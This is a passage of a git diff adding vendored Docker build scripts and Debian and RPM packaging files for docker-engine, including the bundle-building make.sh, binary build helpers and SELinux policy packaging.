+# - The right way to call this script is to invoke "make" from +# your checkout of the Docker repository. +# the Makefile will do a "docker build -t docker ." and then +# "docker run hack/make.sh" in the resulting image. +# + +set -o pipefail + +export DOCKER_PKG='github.com/docker/docker' +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +export MAKEDIR="$SCRIPTDIR/make" +export PKG_CONFIG=${PKG_CONFIG:-pkg-config} + +# We're a nice, sexy, little shell script, and people might try to run us; +# but really, they shouldn't. We want to be in a container! +inContainer="AssumeSoInitially" +if [ "$(go env GOHOSTOS)" = 'windows' ]; then + if [ -z "$FROM_DOCKERFILE" ]; then + unset inContainer + fi +else + if [ "$PWD" != "/go/src/$DOCKER_PKG" ] || [ -z "$DOCKER_CROSSPLATFORMS" ]; then + unset inContainer + fi +fi + +if [ -z "$inContainer" ]; then + { + echo "# WARNING! I don't seem to be running in a Docker container." + echo "# The result of this command might be an incorrect build, and will not be" + echo "# officially supported." + echo "#" + echo "# Try this instead: make all" + echo "#" + } >&2 +fi + +echo + +# List of bundles to create when no argument is passed +DEFAULT_BUNDLES=( + binary-client + binary-daemon + dynbinary + + test-unit + test-integration-cli + test-docker-py + + cross + tgz +) + +VERSION=$(< ./VERSION) +! BUILDTIME=$(date --rfc-3339 ns 2> /dev/null | sed -e 's/ /T/') +if command -v git &> /dev/null && [ -d .git ] && git rev-parse &> /dev/null; then + GITCOMMIT=$(git rev-parse --short HEAD) + if [ -n "$(git status --porcelain --untracked-files=no)" ]; then + GITCOMMIT="$GITCOMMIT-unsupported" + echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" + echo "# GITCOMMIT = $GITCOMMIT" + echo "# The version you are building is listed as unsupported because" + echo "# there are some files in the git repository that are in an uncommitted state." + echo "# Commit these changes, or add to .gitignore to remove the -unsupported from the version." 
+ echo "# Here is the current list:" + git status --porcelain --untracked-files=no + echo "#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" + fi +elif [ "$DOCKER_GITCOMMIT" ]; then + GITCOMMIT="$DOCKER_GITCOMMIT" +else + echo >&2 'error: .git directory missing and DOCKER_GITCOMMIT not specified' + echo >&2 ' Please either build with the .git directory accessible, or specify the' + echo >&2 ' exact (--short) commit hash you are building using DOCKER_GITCOMMIT for' + echo >&2 ' future accountability in diagnosing build issues. Thanks!' + exit 1 +fi + +if [ "$AUTO_GOPATH" ]; then + rm -rf .gopath + mkdir -p .gopath/src/"$(dirname "${DOCKER_PKG}")" + ln -sf ../../../.. .gopath/src/"${DOCKER_PKG}" + export GOPATH="${PWD}/.gopath" + + if [ "$(go env GOOS)" = 'solaris' ]; then + # sys/unix is installed outside the standard library on solaris + # TODO need to allow for version change, need to get version from go + export GO_VERSION=${GO_VERSION:-"1.7.1"} + export GOPATH="${GOPATH}:/usr/lib/gocode/${GO_VERSION}" + fi +fi + +if [ ! "$GOPATH" ]; then + echo >&2 'error: missing GOPATH; please see https://golang.org/doc/code.html#GOPATH' + echo >&2 ' alternatively, set AUTO_GOPATH=1' + exit 1 +fi + +DOCKER_BUILDTAGS+=" daemon" +if ${PKG_CONFIG} 'libsystemd >= 209' 2> /dev/null ; then + DOCKER_BUILDTAGS+=" journald" +elif ${PKG_CONFIG} 'libsystemd-journal' 2> /dev/null ; then + DOCKER_BUILDTAGS+=" journald journald_compat" +fi + +# test whether "btrfs/version.h" exists and apply btrfs_noversion appropriately +if \ + command -v gcc &> /dev/null \ + && ! gcc -E - -o /dev/null &> /dev/null <<<'#include ' \ +; then + DOCKER_BUILDTAGS+=' btrfs_noversion' +fi + +# test whether "libdevmapper.h" is new enough to support deferred remove +# functionality. +if \ + command -v gcc &> /dev/null \ + && ! 
( echo -e '#include \nint main() { dm_task_deferred_remove(NULL); }'| gcc -xc - -o /dev/null -ldevmapper &> /dev/null ) \ +; then + DOCKER_BUILDTAGS+=' libdm_no_deferred_remove' +fi + +# Use these flags when compiling the tests and final binary + +IAMSTATIC='true' +source "$SCRIPTDIR/make/.go-autogen" +if [ -z "$DOCKER_DEBUG" ]; then + LDFLAGS='-w' +fi + +LDFLAGS_STATIC='' +EXTLDFLAGS_STATIC='-static' +# ORIG_BUILDFLAGS is necessary for the cross target which cannot always build +# with options like -race. +ORIG_BUILDFLAGS=( -tags "autogen netgo static_build sqlite_omit_load_extension $DOCKER_BUILDTAGS" -installsuffix netgo ) +# see https://github.com/golang/go/issues/9369#issuecomment-69864440 for why -installsuffix is necessary here + +# When $DOCKER_INCREMENTAL_BINARY is set in the environment, enable incremental +# builds by installing dependent packages to the GOPATH. +REBUILD_FLAG="-a" +if [ "$DOCKER_INCREMENTAL_BINARY" ]; then + REBUILD_FLAG="-i" +fi +ORIG_BUILDFLAGS+=( $REBUILD_FLAG ) + +BUILDFLAGS=( $BUILDFLAGS "${ORIG_BUILDFLAGS[@]}" ) +# Test timeout. + +if [ "${DOCKER_ENGINE_GOARCH}" == "arm" ]; then + : ${TIMEOUT:=10m} +elif [ "${DOCKER_ENGINE_GOARCH}" == "windows" ]; then + : ${TIMEOUT:=8m} +else + : ${TIMEOUT:=5m} +fi + +LDFLAGS_STATIC_DOCKER=" + $LDFLAGS_STATIC + -extldflags \"$EXTLDFLAGS_STATIC\" +" + +if [ "$(uname -s)" = 'FreeBSD' ]; then + # Tell cgo the compiler is Clang, not GCC + # https://code.google.com/p/go/source/browse/src/cmd/cgo/gcc.go?spec=svne77e74371f2340ee08622ce602e9f7b15f29d8d3&r=e6794866ebeba2bf8818b9261b54e2eef1c9e588#752 + export CC=clang + + # "-extld clang" is a workaround for + # https://code.google.com/p/go/issues/detail?id=6845 + LDFLAGS="$LDFLAGS -extld clang" +fi + +# If sqlite3.h doesn't exist under /usr/include, +# check /usr/local/include also just in case +# (e.g. FreeBSD Ports installs it under the directory) +if [ ! 
-e /usr/include/sqlite3.h ] && [ -e /usr/local/include/sqlite3.h ]; then + export CGO_CFLAGS='-I/usr/local/include' + export CGO_LDFLAGS='-L/usr/local/lib' +fi + +HAVE_GO_TEST_COVER= +if \ + go help testflag | grep -- -cover > /dev/null \ + && go tool -n cover > /dev/null 2>&1 \ +; then + HAVE_GO_TEST_COVER=1 +fi + +# a helper to provide ".exe" when it's appropriate +binary_extension() { + if [ "$(go env GOOS)" = 'windows' ]; then + echo -n '.exe' + fi +} + +hash_files() { + while [ $# -gt 0 ]; do + f="$1" + shift + dir="$(dirname "$f")" + base="$(basename "$f")" + for hashAlgo in md5 sha256; do + if command -v "${hashAlgo}sum" &> /dev/null; then + ( + # subshell and cd so that we get output files like: + # $HASH docker-$VERSION + # instead of: + # $HASH /go/src/github.com/.../$VERSION/binary/docker-$VERSION + cd "$dir" + "${hashAlgo}sum" "$base" > "$base.$hashAlgo" + ) + fi + done + done +} + +bundle() { + local bundle="$1"; shift + echo "---> Making bundle: $(basename "$bundle") (in $DEST)" + source "$SCRIPTDIR/make/$bundle" "$@" +} + +copy_binaries() { + dir="$1" + # Add nested executables to bundle dir so we have complete set of + # them available, but only if the native OS/ARCH is the same as the + # OS/ARCH of the build target + if [ "$(go env GOOS)/$(go env GOARCH)" == "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then + if [ -x /usr/local/bin/docker-runc ]; then + echo "Copying nested executables into $dir" + for file in containerd containerd-shim containerd-ctr runc init proxy; do + cp `which "docker-$file"` "$dir/" + if [ "$2" == "hash" ]; then + hash_files "$dir/docker-$file" + fi + done + fi + fi +} + +install_binary() { + file="$1" + target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/" + if [ "$(go env GOOS)" == "linux" ]; then + echo "Installing $(basename $file) to ${target}" + cp -L "$file" "$target" + else + echo "Install is only supported on linux" + return 1 + fi +} + +main() { + # We want this to fail if the bundles already exist and cannot be 
removed. + # This is to avoid mixing bundles from different versions of the code. + mkdir -p bundles + if [ -e "bundles/$VERSION" ] && [ -z "$KEEPBUNDLE" ]; then + echo "bundles/$VERSION already exists. Removing." + rm -fr "bundles/$VERSION" && mkdir "bundles/$VERSION" || exit 1 + echo + fi + + if [ "$(go env GOHOSTOS)" != 'windows' ]; then + # Windows and symlinks don't get along well + + rm -f bundles/latest + ln -s "$VERSION" bundles/latest + fi + + if [ $# -lt 1 ]; then + bundles=(${DEFAULT_BUNDLES[@]}) + else + bundles=($@) + fi + for bundle in ${bundles[@]}; do + export DEST="bundles/$VERSION/$(basename "$bundle")" + # Cygdrive paths don't play well with go build -o. + if [[ "$(uname -s)" == CYGWIN* ]]; then + export DEST="$(cygpath -mw "$DEST")" + fi + mkdir -p "$DEST" + ABS_DEST="$(cd "$DEST" && pwd -P)" + bundle "$bundle" + echo + done +} + +main "$@" diff --git a/vendor/github.com/docker/docker/hack/make/.binary b/vendor/github.com/docker/docker/hack/make/.binary new file mode 100644 index 0000000000..f5c35c3b7e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.binary @@ -0,0 +1,48 @@ +#!/bin/bash +set -e + +BINARY_NAME="$BINARY_SHORT_NAME-$VERSION" +BINARY_EXTENSION="$(binary_extension)" +BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION" + +source "${MAKEDIR}/.go-autogen" + +( +export GOGC=${DOCKER_BUILD_GOGC:-1000} + +if [ "$(go env GOOS)/$(go env GOARCH)" != "$(go env GOHOSTOS)/$(go env GOHOSTARCH)" ]; then + # must be cross-compiling! 
+ case "$(go env GOOS)/$(go env GOARCH)" in + windows/amd64) + export CC=x86_64-w64-mingw32-gcc + export CGO_ENABLED=1 + ;; + esac +fi + +if [ "$IAMSTATIC" == "true" ] && [ "$(go env GOHOSTOS)" == "linux" ]; then + if [ "${GOOS}/${GOARCH}" == "darwin/amd64" ]; then + export CGO_ENABLED=1 + export CC=o64-clang + export LDFLAGS='-linkmode external -s' + export LDFLAGS_STATIC_DOCKER='-extld='${CC} + else + export BUILDFLAGS=( "${BUILDFLAGS[@]/pkcs11 /}" ) # we cannot dlopen in pkcs11 in a static binary + fi +fi + +echo "Building: $DEST/$BINARY_FULLNAME" +go build \ + -o "$DEST/$BINARY_FULLNAME" \ + "${BUILDFLAGS[@]}" \ + -ldflags " + $LDFLAGS + $LDFLAGS_STATIC_DOCKER + " \ + $GO_PACKAGE +) + +echo "Created binary: $DEST/$BINARY_FULLNAME" +ln -sf "$BINARY_FULLNAME" "$DEST/$BINARY_SHORT_NAME$BINARY_EXTENSION" + +hash_files "$DEST/$BINARY_FULLNAME" diff --git a/vendor/github.com/docker/docker/hack/make/.binary-setup b/vendor/github.com/docker/docker/hack/make/.binary-setup new file mode 100644 index 0000000000..b9f8ce2517 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.binary-setup @@ -0,0 +1,10 @@ +#!/bin/bash + +DOCKER_CLIENT_BINARY_NAME='docker' +DOCKER_DAEMON_BINARY_NAME='dockerd' +DOCKER_RUNC_BINARY_NAME='docker-runc' +DOCKER_CONTAINERD_BINARY_NAME='docker-containerd' +DOCKER_CONTAINERD_CTR_BINARY_NAME='docker-containerd-ctr' +DOCKER_CONTAINERD_SHIM_BINARY_NAME='docker-containerd-shim' +DOCKER_PROXY_BINARY_NAME='docker-proxy' +DOCKER_INIT_BINARY_NAME='docker-init' diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/compat b/vendor/github.com/docker/docker/hack/make/.build-deb/compat new file mode 100644 index 0000000000..ec635144f6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/compat @@ -0,0 +1 @@ +9 diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/control b/vendor/github.com/docker/docker/hack/make/.build-deb/control new file mode 100644 index 0000000000..0f5439947c --- /dev/null +++ 
b/vendor/github.com/docker/docker/hack/make/.build-deb/control @@ -0,0 +1,29 @@ +Source: docker-engine +Section: admin +Priority: optional +Maintainer: Docker +Standards-Version: 3.9.6 +Homepage: https://dockerproject.org +Vcs-Browser: https://github.com/docker/docker +Vcs-Git: git://github.com/docker/docker.git + +Package: docker-engine +Architecture: linux-any +Depends: iptables, ${misc:Depends}, ${perl:Depends}, ${shlibs:Depends} +Recommends: aufs-tools, + ca-certificates, + cgroupfs-mount | cgroup-lite, + git, + xz-utils, + ${apparmor:Recommends} +Conflicts: docker (<< 1.5~), docker.io, lxc-docker, lxc-docker-virtual-package, docker-engine-cs +Description: Docker: the open-source application container engine + Docker is an open source project to build, ship and run any application as a + lightweight container + . + Docker containers are both hardware-agnostic and platform-agnostic. This means + they can run anywhere, from your laptop to the largest EC2 compute instance and + everything in between - and they don't require you to use a particular + language, framework or packaging system. That makes them great building blocks + for deploying and scaling web apps, databases, and backend services without + depending on a particular stack or provider. 
diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion new file mode 100644 index 0000000000..6ea1119308 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion @@ -0,0 +1 @@ +contrib/completion/bash/docker diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default new file mode 120000 index 0000000000..4278533d65 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default @@ -0,0 +1 @@ +../../../contrib/init/sysvinit-debian/docker.default \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init new file mode 120000 index 0000000000..8cb89d30dd --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init @@ -0,0 +1 @@ +../../../contrib/init/sysvinit-debian/docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart new file mode 120000 index 0000000000..7e1b64a3e6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart @@ -0,0 +1 @@ +../../../contrib/init/upstart/docker.conf \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install new file mode 100644 index 0000000000..dc6b25f04f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install @@ -0,0 +1,12 @@ +#contrib/syntax/vim/doc/* 
/usr/share/vim/vimfiles/doc/ +#contrib/syntax/vim/ftdetect/* /usr/share/vim/vimfiles/ftdetect/ +#contrib/syntax/vim/syntax/* /usr/share/vim/vimfiles/syntax/ +contrib/*-integration usr/share/docker-engine/contrib/ +contrib/check-config.sh usr/share/docker-engine/contrib/ +contrib/completion/fish/docker.fish usr/share/fish/vendor_completions.d/ +contrib/completion/zsh/_docker usr/share/zsh/vendor-completions/ +contrib/init/systemd/docker.service lib/systemd/system/ +contrib/init/systemd/docker.socket lib/systemd/system/ +contrib/mk* usr/share/docker-engine/contrib/ +contrib/nuke-graph-directory.sh usr/share/docker-engine/contrib/ +contrib/syntax/nano/Dockerfile.nanorc usr/share/nano/ diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages new file mode 100644 index 0000000000..1aa62186a6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages @@ -0,0 +1 @@ +man/man*/* diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst new file mode 100644 index 0000000000..eeef6ca801 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst @@ -0,0 +1,20 @@ +#!/bin/sh +set -e + +case "$1" in + configure) + if [ -z "$2" ]; then + if ! getent group docker > /dev/null; then + groupadd --system docker + fi + fi + ;; + abort-*) + # How'd we get here?? 
+ exit 1 + ;; + *) + ;; +esac + +#DEBHELPER# diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev new file mode 120000 index 0000000000..914a361959 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev @@ -0,0 +1 @@ +../../../contrib/udev/80-docker.rules \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/docs b/vendor/github.com/docker/docker/hack/make/.build-deb/docs new file mode 100644 index 0000000000..b43bf86b50 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/docs @@ -0,0 +1 @@ +README.md diff --git a/vendor/github.com/docker/docker/hack/make/.build-deb/rules b/vendor/github.com/docker/docker/hack/make/.build-deb/rules new file mode 100755 index 0000000000..6522103e5d --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-deb/rules @@ -0,0 +1,55 @@ +#!/usr/bin/make -f + +VERSION = $(shell cat VERSION) +SYSTEMD_VERSION := $(shell dpkg-query -W -f='$${Version}\n' systemd | cut -d- -f1) +SYSTEMD_GT_227 := $(shell [ '$(SYSTEMD_VERSION)' ] && [ '$(SYSTEMD_VERSION)' -gt 227 ] && echo true ) + +override_dh_gencontrol: + # if we're on Ubuntu, we need to Recommends: apparmor + echo 'apparmor:Recommends=$(shell dpkg-vendor --is Ubuntu && echo apparmor)' >> debian/docker-engine.substvars + dh_gencontrol + +override_dh_auto_build: + ./hack/make.sh dynbinary + # ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here + +override_dh_auto_test: + ./bundles/$(VERSION)/dynbinary-daemon/dockerd -v + ./bundles/$(VERSION)/dynbinary-client/docker -v + +override_dh_strip: + # Go has lots of problems with stripping, so just don't + +override_dh_auto_install: + mkdir -p debian/docker-engine/usr/bin + cp -aT "$$(readlink -f bundles/$(VERSION)/dynbinary-client/docker)" debian/docker-engine/usr/bin/docker + cp -aT 
"$$(readlink -f bundles/$(VERSION)/dynbinary-daemon/dockerd)" debian/docker-engine/usr/bin/dockerd + cp -aT /usr/local/bin/docker-proxy debian/docker-engine/usr/bin/docker-proxy + cp -aT /usr/local/bin/docker-containerd debian/docker-engine/usr/bin/docker-containerd + cp -aT /usr/local/bin/docker-containerd-shim debian/docker-engine/usr/bin/docker-containerd-shim + cp -aT /usr/local/bin/docker-containerd-ctr debian/docker-engine/usr/bin/docker-containerd-ctr + cp -aT /usr/local/bin/docker-runc debian/docker-engine/usr/bin/docker-runc + cp -aT /usr/local/bin/docker-init debian/docker-engine/usr/bin/docker-init + mkdir -p debian/docker-engine/usr/lib/docker + +override_dh_installinit: + # use "docker" as our service name, not "docker-engine" + dh_installinit --name=docker +ifeq (true, $(SYSTEMD_GT_227)) + $(warning "Setting TasksMax=infinity") + sed -i -- 's/#TasksMax=infinity/TasksMax=infinity/' debian/docker-engine/lib/systemd/system/docker.service +endif + +override_dh_installudev: + # match our existing priority + dh_installudev --priority=z80 + +override_dh_install: + dh_install + dh_apparmor --profile-name=docker-engine -pdocker-engine + +override_dh_shlibdeps: + dh_shlibdeps --dpkg-shlibdeps-params=--ignore-missing-info + +%: + dh $@ --with=bash-completion $(shell command -v dh_systemd_enable > /dev/null 2>&1 && echo --with=systemd) diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec new file mode 100644 index 0000000000..ae597bd774 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec @@ -0,0 +1,96 @@ +# Some bits borrowed from the openstack-selinux package +Name: docker-engine-selinux +Version: %{_version} +Release: %{_release}%{?dist} +Summary: SELinux Policies for the open-source application container engine +BuildArch: noarch +Group: Tools/Docker + +License: GPLv2 +Source: %{name}.tar.gz + 
+URL: https://dockerproject.org +Vendor: Docker +Packager: Docker + +%global selinux_policyver 3.13.1-102 +%global selinuxtype targeted +%global moduletype services +%global modulenames docker + +Requires(post): selinux-policy-base >= %{selinux_policyver}, selinux-policy-targeted >= %{selinux_policyver}, policycoreutils, policycoreutils-python libselinux-utils +BuildRequires: selinux-policy selinux-policy-devel + +# conflicting packages +Conflicts: docker-selinux + +# Usage: _format var format +# Expand 'modulenames' into various formats as needed +# Format must contain '$x' somewhere to do anything useful +%global _format() export %1=""; for x in %{modulenames}; do %1+=%2; %1+=" "; done; + +# Relabel files +%global relabel_files() \ + /sbin/restorecon -R %{_bindir}/docker %{_localstatedir}/run/docker.sock %{_localstatedir}/run/docker.pid %{_sysconfdir}/docker %{_localstatedir}/log/docker %{_localstatedir}/log/lxc %{_localstatedir}/lock/lxc %{_usr}/lib/systemd/system/docker.service /root/.docker &> /dev/null || : \ + +%description +SELinux policy modules for use with Docker + +%prep +%if 0%{?centos} <= 6 +%setup -n %{name} +%else +%autosetup -n %{name} +%endif + +%build +make SHARE="%{_datadir}" TARGETS="%{modulenames}" + +%install + +# Install SELinux interfaces +%_format INTERFACES $x.if +install -d %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} +install -p -m 644 $INTERFACES %{buildroot}%{_datadir}/selinux/devel/include/%{moduletype} + +# Install policy modules +%_format MODULES $x.pp.bz2 +install -d %{buildroot}%{_datadir}/selinux/packages +install -m 0644 $MODULES %{buildroot}%{_datadir}/selinux/packages + +%post +# +# Install all modules in a single transaction +# +if [ $1 -eq 1 ]; then + %{_sbindir}/setsebool -P -N virt_use_nfs=1 virt_sandbox_use_all_caps=1 +fi +%_format MODULES %{_datadir}/selinux/packages/$x.pp.bz2 +%{_sbindir}/semodule -n -s %{selinuxtype} -i $MODULES +if %{_sbindir}/selinuxenabled ; then + %{_sbindir}/load_policy + 
%relabel_files + if [ $1 -eq 1 ]; then + restorecon -R %{_sharedstatedir}/docker + fi +fi + +%postun +if [ $1 -eq 0 ]; then + %{_sbindir}/semodule -n -r %{modulenames} &> /dev/null || : + if %{_sbindir}/selinuxenabled ; then + %{_sbindir}/load_policy + %relabel_files + fi +fi + +%files +%doc LICENSE +%defattr(-,root,root,0755) +%attr(0644,root,root) %{_datadir}/selinux/packages/*.pp.bz2 +%attr(0644,root,root) %{_datadir}/selinux/devel/include/%{moduletype}/*.if + +%changelog +* Tue Dec 1 2015 Jessica Frazelle 1.9.1-1 +- add licence to rpm +- add selinux-policy and docker-engine-selinux rpm diff --git a/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec new file mode 100644 index 0000000000..d53e55b6c9 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec @@ -0,0 +1,254 @@ +Name: docker-engine +Version: %{_version} +Release: %{_release}%{?dist} +Summary: The open-source application container engine +Group: Tools/Docker + +License: ASL 2.0 +Source: %{name}.tar.gz + +URL: https://dockerproject.org +Vendor: Docker +Packager: Docker + +# is_systemd conditional +%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?suse_version} >= 1210 +%global is_systemd 1 +%endif + +# required packages for build +# most are already in the container (see contrib/builder/rpm/ARCH/generate.sh) +# only require systemd on those systems +%if 0%{?is_systemd} +%if 0%{?suse_version} >= 1210 +BuildRequires: systemd-rpm-macros +%{?systemd_requires} +%else +%if 0%{?fedora} >= 25 +# Systemd 230 and up no longer have libsystemd-journal (see https://bugzilla.redhat.com/show_bug.cgi?id=1350301) +BuildRequires: pkgconfig(systemd) +Requires: systemd-units +%else +BuildRequires: pkgconfig(systemd) +Requires: systemd-units +BuildRequires: pkgconfig(libsystemd-journal) +%endif +%endif +%else +Requires(post): chkconfig +Requires(preun): chkconfig +# This is for 
/sbin/service +Requires(preun): initscripts +%endif + +# required packages on install +Requires: /bin/sh +Requires: iptables +%if !0%{?suse_version} +Requires: libcgroup +%else +Requires: libcgroup1 +%endif +Requires: tar +Requires: xz +%if 0%{?fedora} >= 21 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +# Resolves: rhbz#1165615 +Requires: device-mapper-libs >= 1.02.90-1 +%endif +%if 0%{?oraclelinux} >= 6 +# Require Oracle Unbreakable Enterprise Kernel R4 and newer device-mapper +Requires: kernel-uek >= 4.1 +Requires: device-mapper >= 1.02.90-2 +%endif + +# docker-selinux conditional +%if 0%{?fedora} >= 20 || 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +%global with_selinux 1 +%endif + +# DWZ problem with multiple golang binary, see bug +# https://bugzilla.redhat.com/show_bug.cgi?id=995136#c12 +%if 0%{?fedora} >= 20 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +%global _dwz_low_mem_die_limit 0 +%endif + +# start if with_selinux +%if 0%{?with_selinux} +# Version of SELinux we were using +%if 0%{?fedora} == 20 +%global selinux_policyver 3.12.1-197 +%endif # fedora 20 +%if 0%{?fedora} == 21 +%global selinux_policyver 3.13.1-105 +%endif # fedora 21 +%if 0%{?fedora} >= 22 +%global selinux_policyver 3.13.1-128 +%endif # fedora 22 +%if 0%{?centos} >= 7 || 0%{?rhel} >= 7 || 0%{?oraclelinux} >= 7 +%global selinux_policyver 3.13.1-23 +%endif # centos,oraclelinux 7 +%endif # with_selinux + +# RE: rhbz#1195804 - ensure min NVR for selinux-policy +%if 0%{?with_selinux} +Requires: selinux-policy >= %{selinux_policyver} +Requires(pre): %{name}-selinux >= %{version}-%{release} +%endif # with_selinux + +# conflicting packages +Conflicts: docker +Conflicts: docker-io +Conflicts: docker-engine-cs + +%description +Docker is an open source project to build, ship and run any application as a +lightweight container. + +Docker containers are both hardware-agnostic and platform-agnostic. 
This means +they can run anywhere, from your laptop to the largest EC2 compute instance and +everything in between - and they don't require you to use a particular +language, framework or packaging system. That makes them great building blocks +for deploying and scaling web apps, databases, and backend services without +depending on a particular stack or provider. + +%prep +%if 0%{?centos} <= 6 || 0%{?oraclelinux} <=6 +%setup -n %{name} +%else +%autosetup -n %{name} +%endif + +%build +export DOCKER_GITCOMMIT=%{_gitcommit} +./hack/make.sh dynbinary +# ./man/md2man-all.sh runs outside the build container (if at all), since we don't have go-md2man here + +%check +./bundles/%{_origversion}/dynbinary-client/docker -v +./bundles/%{_origversion}/dynbinary-daemon/dockerd -v + +%install +# install binary +install -d $RPM_BUILD_ROOT/%{_bindir} +install -p -m 755 bundles/%{_origversion}/dynbinary-client/docker-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/docker +install -p -m 755 bundles/%{_origversion}/dynbinary-daemon/dockerd-%{_origversion} $RPM_BUILD_ROOT/%{_bindir}/dockerd + +# install proxy +install -p -m 755 /usr/local/bin/docker-proxy $RPM_BUILD_ROOT/%{_bindir}/docker-proxy + +# install containerd +install -p -m 755 /usr/local/bin/docker-containerd $RPM_BUILD_ROOT/%{_bindir}/docker-containerd +install -p -m 755 /usr/local/bin/docker-containerd-shim $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-shim +install -p -m 755 /usr/local/bin/docker-containerd-ctr $RPM_BUILD_ROOT/%{_bindir}/docker-containerd-ctr + +# install runc +install -p -m 755 /usr/local/bin/docker-runc $RPM_BUILD_ROOT/%{_bindir}/docker-runc + +# install tini +install -p -m 755 /usr/local/bin/docker-init $RPM_BUILD_ROOT/%{_bindir}/docker-init + +# install udev rules +install -d $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d +install -p -m 644 contrib/udev/80-docker.rules $RPM_BUILD_ROOT/%{_sysconfdir}/udev/rules.d/80-docker.rules + +# add init scripts +install -d $RPM_BUILD_ROOT/etc/sysconfig +install -d 
$RPM_BUILD_ROOT/%{_initddir} + + +%if 0%{?is_systemd} +install -d $RPM_BUILD_ROOT/%{_unitdir} +install -p -m 644 contrib/init/systemd/docker.service.rpm $RPM_BUILD_ROOT/%{_unitdir}/docker.service +%else +install -p -m 644 contrib/init/sysvinit-redhat/docker.sysconfig $RPM_BUILD_ROOT/etc/sysconfig/docker +install -p -m 755 contrib/init/sysvinit-redhat/docker $RPM_BUILD_ROOT/%{_initddir}/docker +%endif +# add bash, zsh, and fish completions +install -d $RPM_BUILD_ROOT/usr/share/bash-completion/completions +install -d $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions +install -d $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d +install -p -m 644 contrib/completion/bash/docker $RPM_BUILD_ROOT/usr/share/bash-completion/completions/docker +install -p -m 644 contrib/completion/zsh/_docker $RPM_BUILD_ROOT/usr/share/zsh/vendor-completions/_docker +install -p -m 644 contrib/completion/fish/docker.fish $RPM_BUILD_ROOT/usr/share/fish/vendor_completions.d/docker.fish + +# install manpages +install -d %{buildroot}%{_mandir}/man1 +install -p -m 644 man/man1/*.1 $RPM_BUILD_ROOT/%{_mandir}/man1 +install -d %{buildroot}%{_mandir}/man5 +install -p -m 644 man/man5/*.5 $RPM_BUILD_ROOT/%{_mandir}/man5 +install -d %{buildroot}%{_mandir}/man8 +install -p -m 644 man/man8/*.8 $RPM_BUILD_ROOT/%{_mandir}/man8 + +# add vimfiles +install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc +install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/ftdetect +install -d $RPM_BUILD_ROOT/usr/share/vim/vimfiles/syntax +install -p -m 644 contrib/syntax/vim/doc/dockerfile.txt $RPM_BUILD_ROOT/usr/share/vim/vimfiles/doc/dockerfile.txt +install -p -m 644 contrib/syntax/vim/ftdetect/dockerfile.vim 